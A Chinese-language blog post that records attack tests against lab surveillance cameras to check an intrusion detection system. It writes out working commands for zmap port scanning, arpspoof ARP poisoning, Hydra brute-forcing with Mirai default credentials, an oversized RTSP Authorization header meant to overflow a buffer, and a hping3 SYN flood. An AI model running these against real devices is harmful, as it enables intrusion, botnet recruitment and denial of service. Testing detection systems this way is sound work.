几种攻击简单测试

Posted by Johan Niu on May 20, 2018

几种攻击简单测试

1 端口探测

使用zmap扫描工具对视频监控网络进行端口扫描。

命令如下:

zmap -p 23 -B 50k 192.168.12.0/24 -b telnet_portscan.csv;

测试结果在威胁界面的展示如图:

对192.168.12.0/24网段的16台摄像头的23端口进行端口扫描,共产生16条报警记录信息。

1.1 端口扫描工具

工具 状态
nmap 有状态
zmap 无状态
massscan 无状态

基于 zmap 的应用层扫描器 zgrab

zgrab 是基于zmap无状态扫描的应用层扫描器,可以自定义数据包,以及ip,domain之间的关联。

可用于快速指纹识别爆破等场景。

2 ARP欺骗

使用arpspoof攻击在视频监控内网进行ARP投毒。

对摄像头192.168.12.143进行ARP 攻击。

先打开 IP 转发:

echo 1 > /proc/sys/net/ipv4/ip_forward

然后使用 arpspoof 命令进行欺骗, 命令使用方法如下:

arpspoof -i <网卡名> -t <欺骗的目标> <我是谁>

实际命令如下:

arpspoof -i eth0 -t 192.168.12.143 192.168.12.1;

测试结果在威胁界面的展示如图:

3 口令探测

利用开源工具hydra进行口令探测攻击。

这里利用Mirai病毒中的user与password表作为默认的口令库,

然后加入视频监控设备厂商的默认口令库。形成user.txt、passwd.txt文件。

从ssh、telnet、ftp协议服务方面测试入侵检测系统对口令探测的检测能力。

命令如下(其中ip.list即为192.168.12.0/24网段的所有视频监控ip):

hydra -L user.txt -P passwd.txt -vV -e ns -M ip.list ssh;
hydra -L user.txt -P passwd.txt -vV -e ns -M ip.list telnet;
hydra -L user.txt -P passwd.txt -vV -e ns -M ip.list ftp

测试结果在威胁界面的展示如图:

4 缓冲区溢出

利用存在RTSP协议的缓冲区溢出漏洞的摄像头进行缓冲区溢出攻击测试。 RTSP协议的交互需要 DESCRIBE reques 请求,构造 RTSP DESCRIBE option 的请求数据包如下:

RTSP_DESCRIBE_HEADERS_MAP = {
    "CSeq": "3",
    "Accept": "application/sdp",
    "Authorization": "Digest " + 'A' * 10000,
    "User-Agent": "VLC media player"
}

测试结果在威胁界面的展示如图:

5 模拟DDOS攻击

使用hping3开源工具进行DOS攻击测试,

采用SYN Flooding对摄像头192.168.12.143进行DOS攻击,验证入侵检测系统是否能够检测出来。

命令如下:

hping3 -I eth0 -a 192.168.12.27 -S 192.168.12.143 -p 80 -i u1000;

6 Web攻击

本测试采用海康威视摄像头存在的SQL注入漏洞进行Web攻击,利用SSV-91768(seebug 漏洞编号)漏洞信息,伪造请求进行注入。